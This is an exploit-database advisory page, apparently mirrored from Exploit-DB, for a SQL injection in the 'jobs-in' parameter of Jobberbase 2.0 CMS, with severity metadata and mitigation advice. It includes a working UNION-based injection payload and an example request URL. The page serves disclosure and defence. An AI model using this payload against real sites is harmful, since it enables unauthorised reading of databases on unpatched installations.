header-logo
Suggest Exploit
vendor:
Jobberbase CMS
by:
Suvadip Kar
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Jobberbase CMS
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE: a:jobberbase:jobberbase:2.0
Metasploit:
Other Scripts:
Platforms Tested: Linux
2019

Jobberbase 2.0 CMS – ‘jobs-in’ SQL Injection

The Jobberbase 2.0 CMS is vulnerable to SQL Injection in the 'jobs-in' parameter. By injecting a specially crafted payload, an attacker can manipulate the SQL query and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL Injection attacks. Regularly updating the software to the latest version is also advised.
Source

Exploit-DB raw data:

# Exploit Title: Jobberbase 2.0 CMS - 'jobs-in' SQL Injection
# Google Dork: N/A
# Date: 28, August 2019
# Exploit Author: Suvadip Kar
# Vendor Homepage:  http://jobberbase.com/
# Software Link: https://github.com/filipcte/jobberbase/zipball/master
# Version: 2.0
# Tested on: Linux
# CVE : N/A

--------------------------------------------------------------------------------

#POC - SQLi
#Request: http://localhost/[PATH]/jobs/jobs-in/
#Vulnerable Parameter: jobs-in (GET)
#Payload: -4115" UNION ALL SELECT 33,user()-- XYZ

#EXAMPLE: http://localhost/[PATH]/jobs/jobs-in/-4115" UNION ALL SELECT
33,user()-- XYZ

Navigation

Suggest Exploit

Services By CQR